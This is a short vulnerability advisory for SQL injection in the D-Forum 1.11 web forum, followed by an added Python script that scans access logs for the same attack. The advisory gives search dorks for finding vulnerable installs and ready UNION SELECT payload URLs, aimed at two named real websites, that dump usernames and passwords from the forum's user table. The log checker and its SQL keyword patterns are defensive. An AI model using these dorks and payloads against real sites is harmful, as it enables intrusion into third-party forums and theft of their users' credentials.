D-Forum 1.11 SQL Injection Vulnerability

Software : D-Forum version 1.11 [previous versions affected too]
Vendor : http://www.adalis.fr/dforum
Author : NoGe


[o] Exploit

http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]


[o] Dork

"Powered by D-forum"
"nav.php3?page=voirsujet"


[o] PoC

http://www.enesm.com/forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
http://bmxverrieres.free.fr/dforum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--
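
A log check for operators of a D-Forum install, added here as an example and not part of the original advisory: it flags `nav.php3?page=voirsujet` requests whose `postid` is not a plain integer or carries SQL fragments after URL decoding. The combined log format, the rule that a legitimate `postid` is numeric, and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# SQL fragments of the kind shown in the advisory, matched after URL decoding.
SQL_TOKENS = re.compile(r"union\s+select|group_concat|dforum_users|--", re.I)

def check_line(line):
    """Return (path, reasons) if the line looks like postid injection, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/nav.php3"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # decodes %xx and '+'
    if params.get("page", [""])[0] != "voirsujet":
        return None
    reasons = set()
    for value in params.get("postid", []):
        # Assumption: a legitimate postid is a plain non-negative integer.
        if not re.fullmatch(r"[0-9]+", value):
            reasons.add("non-numeric postid")
        if SQL_TOKENS.search(value):
            reasons.add("SQL keywords in postid")
    return (url.path, sorted(reasons)) if reasons else None

def scan(lines):
    """Return [(line_number, path, reasons)] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = check_line(line)
        if result:
            hits.append((n, *result))
    return hits

# Constructed sample log lines (documentation addresses, hypothetical /forum/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /forum/nav.php3?page=voirsujet&boardid=1&postid=42 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /forum/nav.php3?page=voirsujet&boardid=x&postid=-null+union+select+1,2,3-- HTTP/1.1" 200 6011',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /forum/nav.php3?page=voirsujet&boardid=1&postid=1%20UNION%20SELECT%201,2 HTTP/1.1" 200 6011',
    '192.0.2.11 - - [01/Jan/2024:10:01:00 +0000] "GET /forum/nav.php3?page=index HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule belongs in the application itself: cast or validate `postid` before it reaches the query, and use the log check only to find past or ongoing attempts.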
